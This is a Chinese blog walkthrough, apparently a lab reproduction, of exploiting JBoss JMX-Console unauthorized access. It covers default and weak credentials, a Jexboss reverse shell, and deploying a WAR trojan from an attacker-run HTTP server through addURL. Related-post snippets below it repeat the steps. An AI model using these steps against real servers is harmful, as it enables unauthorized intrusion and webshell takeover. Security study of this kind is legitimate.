Jboss未授权访问getshell(JMX-Console)

原创 已于 2022-12-11 11:21:50 修改 · 1.4k 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#服务器 #运维
于 2022-12-10 11:48:35 首次发布

漏洞简介

Jboss的webUI界面 http: ip:port/jmx-console 未授权访问(或默认密码 admin/admin),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取webshell

默认端口:8080

环境搭建

使用docker搭建

docker search testjboss

docker pull testjboss/jboss

docker run -d -p 8080:8080  testjboss/jboss

漏洞复现

1.Jexboss脚本反弹shell

详细介绍请参考GitHub文档:

https://github.com/joaomatosf/jexboss

下载脚本至kali,在脚本目录下使用。

 执行命令,出现以下界面

出现 ”VULNERABLE“,表示存在漏洞。

 提示:yes/no?,输入yes

创建链接,反弹shell。

2.直接访问http: your-ip:8080/jmx-console

直接登陆或通过弱口令账号密码登陆,表示存在漏洞

部署war包,getshell

找到:jboss.deployment

点击进入

 提前开启一个新的服务器:python3 -m http.server

将war包部署在新服务器下,复制war包地址

找到:void addURL()

输入war包地址,点击invoke

 出现此界面

 然后返回到JMX-Console目录中,查看是否部署成功

稍等一下刷新

部署成功

war包部署成功,但是蚁剑链接失败。经多次尝试,目前没有解决。

待续

JBoss漏洞:Jboss未授权访问漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-09 1206
Jboss未授权访问漏洞合集:JBOSS未授权访问漏洞表现为,在默认情况下无需账密就可以直接访问http://127.0.0.1:8080/jmx-console进入管理控制台,进而导致网站信息泄露、服务器被上传shell(如反弹shell,wget写webshell文件),最终网站被攻陷。 该漏洞影响所有低版本的JBOSS,对其下用户影响深远. JBoss 4 使用vulnhub提供的环境
jboss--JMX Console未授权访问
hovcfuti的博客
10-13 1018
然后找到jboss.deployment(jboss 自带的部署功能)中的flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到jmx控制台,并在其中执⾏任何功能。若需登录,可以尝试爆破弱口令登录。返回JMX Console里面,刷新找到jboss.web.deployment,如果出现上传的war,则部署成功。
Web漏洞-未授权访问漏洞
Ays.Ie的博客
03-21 4852
该篇记录了web漏洞-未授权访问漏洞的相关知识
JBOSS未授权漏洞总结
m0_64481831的博客
04-03 2631
JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。JBOSS未授权访问漏洞介绍漏洞原理JBOSS未授权漏洞在默认情况下无需账号密码就可以直接访问后台管理控制台页面(),导致攻击者可以获取网站信息、上传webshell,获取服务器权限等。
未授权访问JBoss未授权访问漏洞
qq_68163788的博客
05-12 906
JBoss未授权访问漏洞是指攻击者可以通过构造特定的请求包,在未经授权的情况下远程执行命令,进而控制服务器。该漏洞主要影响JBoss管理界面,由于默认配置下,JBoss管理界面存在弱口令和默认账户等问题,因此容易被攻击者利用。 攻击者通过向JBoss管理界面发送恶意请求,可以实现对服务器的远程命令执行、文件上传等操作。此外,由于JBoss管理界面存在多个版本,不同版本的漏洞细节也存在差异,因此需要根据具体情况进行修复。
【实战】Jboss未授权访问JMX-ConsoleGetshell
cj_Hydra's Blog
11-05 3018
都是重复造轮子,没啥技术含量,只能说以后遇到了知道怎么操作就行。 GO: 访问地址:http://ip/JMX-Console 找到jboss.deployment 进入页面后找到void addURL() 此时部署我们远程的war木马,部署好了以后点击Invoke http:vpsIP地址/soft/cus.war 随后来到URLList中查看Value值是否已经部署好,并且为我们的远程war木马地址 最后点击Apply Changes 后耐心等待一会儿,然后回到JMX-Console目录中 找到
【vulhub】Jboss4.x_后台上传war包getshell
qq_45300786的博客
04-15 1786
Jboss 默认端口:8080 Jboss常见弱口令: admin/admin jboss/admin admin/jboss admin/123456 admin/password Jboss管理控制台 Jboss4.x 启动环境 jboss 4.x 及其之前的版本 console 管理路径为 /jmx-console 和 /web-console jmx-console的配置文件为 #jboss的绝对路径不同网站不一样 /opt/jboss/jboss4/server/default/deploy/
实战记录:我是如何用Jexboss一键拿下JBoss未授权访问漏洞的
最新发布
transformer2023的博客
03-03 930
本文详细记录了利用Jexboss自动化工具检测和利用JBoss未授权访问漏洞的完整实战过程。文章从漏洞原理分析入手,逐步演示了环境部署、漏洞扫描、自动化利用以获取Shell的步骤,并探讨了批量扫描、反序列化利用等进阶技巧,为安全工程师提供了高效的工具化实战指南。
从零复现JBoss未授权访问漏洞到Getshell实战
weixin_29324401的博客
02-14 259
本文详细介绍了从零开始复现JBoss未授权访问漏洞并最终获取服务器Shell权限的完整实战过程。通过搭建Vulhub靶场环境,深入剖析漏洞原理,并演示了手动制作JSP木马、利用JMX控制台远程部署WAR包,以及使用Jexboss工具进行自动化利用的步骤。文章旨在帮助安全研究人员理解该高危漏洞的利用链,并提供了升级版本、配置认证等关键防御建议,以提升JBoss服务器的安全性。
JBoss 未授权访问和弱口令复现
weixin_53747497的博客
02-21 1752
一个基于J2EE的开放源代码的应用服务器JBoss 是一个管理 EJB 的容器和服务器,但 JBoss 核心服务不包括支持 servlet/JSP 的WEB容器,一般 与Tomcat或Jetty绑定使用。Jboss是Java EE 应用服务器(就像Apache是web服务器一样),专门用来 运行Java EE程序的。JBoss Administration Console存在默认账号密码admin/admin,但如果在vulhub上搭建的靶场,那密码就是vulhub。
JBoss安全之jmx-console控制台未授权访问漏洞
Keep learing, and stay fast
11-02 5142
近期工作用到了jmx-console,顺便整理下JbossJmx-console密码访问相关的知识与配置。 MBean就是一种规范的JavaBean,通过集成和实现一套标准的Bean接口,这种叫MBean,Mbean注册到MBeanServer中。之后将被MBeanServer中注册过的Adapter(比如渲染为HTML的HtmlAdapter)渲染为直观的页面将MBean的属性和方法展示给用户。 MBean -> MBeanServer ...
中间件安全:JBOSS 未授权访问漏洞.
网络安全领域___专研者.
07-30 928
JBoss 是一个基于 J2EE 的开放源代码的 应用服务器JBoss 未授权访问漏洞允许攻击者在没有进行身份验证的情况下访问 JBoss 的管理控制台。通过该漏洞攻击者可以后台管理服务,甚至可以通过脚本命令执行系统命令,如反弹 shell、wget 写 webshell 文件等。
[原创]K8 Jboss jmx-console getshell exploit
weixin_30496431的博客
04-02 519
[原创]K8 Jboss jmx-console getshell exploit https://www.cnblogs.com/k8gege/p/10645858.html 0x00 前言 今天内网遇到几台Jboss,使用MSF确实是有点烦,要打几条命令设置一堆参数,我一个粘贴搞定的 为什么非要使用手动打好几条命令,让外行人看起来牛逼吗?大家都知道黑客电影打字快并不是高手 那些...
Jboss弱口令Getshell
HAKUNAMATATATTA的博客
12-09 1656
JBoss Administration Console存在默认账号密码admin/vulhub,如果Administration Console可以登录,就可以在后台部署war包getshell
JBoss未授权访问漏洞Getshell过程复现
道阻且长,行则将至
06-21 4700
文章目录前言漏洞复现漏洞描述靶场搭建漏洞利用防御手段Jexboss脚本 前言 在 2021 年第五届强网杯全国网络安全挑战赛的 EasyWeb 赛题中遇到了 JBoss 未授权访问漏洞 GetShell 的漏洞场景(2021强网杯全国网络安全挑战赛Writeup),当时一脸懵圈,故在此进行学习记录下。 漏洞复现 JBoss 是一个管理 EJB 的容器和服务器,支持 EJB 1.1、EJB 2.0 和 EJB3 的规范。但 JBoss 核心服务不包括支持 servlet/JSP 的 WEB 容器,一般与 To
JMX Console 未授权访问漏洞
懂进攻知防守
07-23 6436
Jboss的webUI界面http//ipport/jmx-console未授权访问(或默认密码admin/admin),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取webshell。
Jboss通过未授权/弱口令进入后台上传webshell
qq_68163788的博客
06-27 1437
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
Jboss未授权访问
qq_44880255的博客
08-11 1834
1、jmx-console未授权访问 漏洞原因 JBoss默认访问jmx-console页面不需要输入密码,可以进入配置war包进行危险操作。或默认用户名密码为admin/admin。 漏洞复现 这里使用的环境是kali中的vulhub和docker。 进入vulhub/jboss/CVE-2017-12149目录,执行命令docker-compose up -d开启环境。 访问http://your-ip:8080/。(这里我的IP是172.17.0.1) 构造payload部署war包。 http
【漏洞挖掘】——89、JBOSS未授权访问利用
Fly_鹏程万里
06-14 235
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用,JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范,默认情况下访问http://ip:8080/jmx-console可以浏览JBoss的部署管理的信息,不需要输入用户名和密码可以直接部署上传木马存在安全隐患。
Jboss 4.x版本jmx-console控制台弱口令getshell
来到了学渣的博客
08-31 3037
总结: 1.发现jboss4.0,尝试弱口令,成功 2.直接访问ip/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL 3.void addurl中的Param Value中插入公网部署好的war包 4.返回第二步,并点击apply changes 5.查看jmx-console目录下如果有部署war包的名字证明上传成功 6.ip/wa
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值